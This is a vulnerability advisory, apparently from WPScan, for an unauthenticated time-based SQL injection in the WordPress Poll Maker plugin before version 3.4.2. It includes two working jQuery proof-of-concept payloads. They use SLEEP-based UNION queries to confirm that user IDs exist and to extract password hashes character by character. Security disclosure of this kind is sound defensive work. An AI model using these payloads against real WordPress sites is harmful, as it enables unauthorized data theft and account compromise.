WordPress Plugin Vulnerabilities
Poll Maker < 3.4.2 - Unauthenticated Time Based SQL Injection
Description
The plugin allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. While the result is not disclosed in the response, it is possible to use a timing attack to exfiltrate data such as password hash.
Proof of Concept
This requires a valid nonce, which can be obtained by going to a page with a published poll and checking the value of ays_finish_poll hidden input.
PoC 1: If the user 1234 exists, this query takes around 10 seconds; if not, the query should be quick.
jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1234 AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})
PoC 2: This uses builtin MariaDB functions to bypass magic quote. CHAR(36,80,36,66,37 USING utf8) is "$P$B%" (in a LIKE statement). If this query takes more than 10 seconds to execute, there's probably a user with ID 1 and password hash starting with "$P$B".
jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1 AND user_pass LIKE CHAR(36,80,36,66,37 USING utf8) AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})
Affects Plugins
Fixed in 3.4.2 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-13 (about 2 years ago)
Added
2021-09-13 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
WPScan 